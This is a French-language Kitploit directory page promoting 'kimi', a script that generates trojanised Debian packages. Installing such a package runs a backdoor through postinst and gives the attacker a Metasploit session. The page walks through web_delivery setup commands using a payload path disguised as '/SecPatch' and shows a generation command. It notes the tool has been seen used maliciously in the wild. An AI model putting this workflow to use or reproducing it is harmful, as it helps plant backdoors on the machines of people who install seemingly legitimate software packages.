Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
kimi — Script pour générer des paquets debian malveillants (trojan debain). | Kitploit
Outils/GitHubGitHub/chaitanyaharitash/kimi
Frameworks d'ExploitationGénération de PayloadsPost-ExploitationAnalyse de MalwareTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubchaitanyaharitash/kimi

kimi

Script pour générer des paquets debian malveillants (trojan debain).

Voir le dépôt
123546il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

kimi - Générateur de paquets Debian malveillants

Script pour générer des paquets Debian malveillants (chevaux de Troie debain).

À propos & Points forts & Utilisation & Testé sur :::

root@kitploit:~
Kimi est un nom inspiré de « Kimimaro », l'un de mes personnages préférés d'un anime appelé « Naruto ».

Kimi est un script qui génère un paquet Debian malveillant pour Metasploit
qui contient un fichier bash. Le fichier bash est déployé dans le répertoire « /usr/local/bin/ ».

La porte dérobée est exécutée dès que la victime tente d'installer le paquet deb grâce au fichier postinst.

Le fichier bash injecte et agit également comme une commande système qui, lorsqu'elle est exécutée par la victime, permet à l'attaquant d'obtenir une session.

Points forts :
-- Totalement indépendant. L'utilisateur n'a pas besoin d'installer de créateur de paquets Debian
-- Peut être facilement intégré à n'importe quel générateur de charge utile grâce aux arguments (lame :P je sais)

Kimi dépend essentiellement du module web_delivery et tout est automatisé.
Tout ce que l'attaquant doit faire est de configurer les paramètres suivants :

Configuration de Web_Delivery dans msf :

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Génération de la charge utile malveillante :

dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386

NOTE :: Ce projet a été créé pour être intégré avec Venom Shellcode Generator 1.0.13.
Il peut également être utilisé seul, tout ce que l'utilisateur doit faire est de modifier uripath dans les variables msf.
-------------------------------------------------------------------------------------

Testé sur :
            Linux Mint 17.2 Cinnamon (Ubuntu 14.04) 
            ParrotOS (Debian Jessie)
            Kali Rolling 2.0

Mises à jour :::

root@kitploit:~
[Feb-22-2017]
-- Ajout de la fonction de création de fichier « postinst » pour automatiser l'exécution du fichier malveillant intégré
-- Ajout de la fonction de génération de fichier RC pour une automatisation complète avec l'ouverture du handler, ce qui signifie qu'il n'est pas nécessaire de configurer le handler manuellement
-- Correction de quelques bugs courants [merci spécial à r00t 3xp10it :)]

[Oct-12-2017]
-- Ajout de l'argument de ligne de commande (-a/--arch) pour sélectionner l'architecture (i386/amd64)

[April-24-2019] - Test Release.
-- Désormais, l'URI personnalisé et le LPORT peuvent être définis
-- La charge utile Python a été mise à jour pour correspondre à Python 2/3 et également à la dernière version de Metasploit 5.
-- Tout le code a été réimplémenté bien qu'il supporte toujours Python 2.7

Captures d'écran :::

Main Banner Kimi In Action

Divers :::

root@kitploit:~
   Article de blog : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
   Vidéo YouTube : https://youtu.be/Dsn6BRHy9_w
   Échantillon VirusTotal (parce que j'ai vu une utilisation malveillante de ce script dans la nature) : 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f

Remerciements à :::

Suspicious Shell Activity [Red Team]

Des doutes ? Des insultes ?

Twitter : @bofheaded

Télécharger l’outil